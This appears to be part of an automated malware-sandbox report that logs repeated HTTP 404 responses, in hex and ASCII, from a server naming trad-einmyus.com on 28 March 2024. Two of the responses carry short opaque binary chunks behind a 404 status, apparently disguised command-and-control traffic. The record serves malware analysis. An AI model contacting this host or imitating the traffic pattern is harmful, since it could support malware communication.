Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:06 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:06 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:10 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:11 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:13 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 32 46 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cc d5 54 02 6c 5c e5 aa 81 fc ab 12 ea 15 da 2d b8 45 52 9d 0b fe ee 3a ae 2f 4d 1b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2FI:82OTl\-ER:/M0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:20 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:21 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 34 46 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4F73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:21 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:22 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
